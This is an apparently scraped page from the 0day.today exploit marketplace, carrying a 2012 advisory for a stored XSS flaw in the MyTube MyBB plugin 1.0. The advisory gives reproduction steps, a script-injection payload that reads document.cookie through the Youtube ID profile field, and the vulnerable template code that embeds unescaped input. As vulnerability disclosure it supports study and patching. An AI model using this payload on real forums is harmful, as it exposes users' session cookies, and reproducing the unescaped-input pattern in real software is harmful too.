0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
MyTube MyBB Plugin 1.0 Stored XSS Vulnerability
[# Exploit Title: MyTube MyBB Plugin Stored XSS
# Date: 18/12/2012
# Exploit Author: Kim Kun Bum
# Vendor by:
# Software Link: http://mods.mybb.com/view/mytube
# Version: 1.0
# Category:Web Security
# Tested on: Windows7
Reason : Lack of input validation in Youtube ID field
+--------------------------------------------------------------------------+
Stored XSS-vulnerabilities
0. install&Activate plugin
1. go to Usercp >> Edit Profile >> Youtube:
2. inject following code
"http://www.youtube.com?v="</embed> <script> alert(document.cookie) </script>
3. This code will be stored as profile content.
4. Visit your profile and Can see the execution of injected script
Vulnerable code in mytube.php soucre :
function mytube_activate(){....<embed src="http://www.youtube.com/v/{$tubeid}{$autoplay}" type="application/x-
shockwave-flash" wmode="transparent" width="425" height="344"></embed></object></td></tr>}
# 0day.today [2024-11-15] #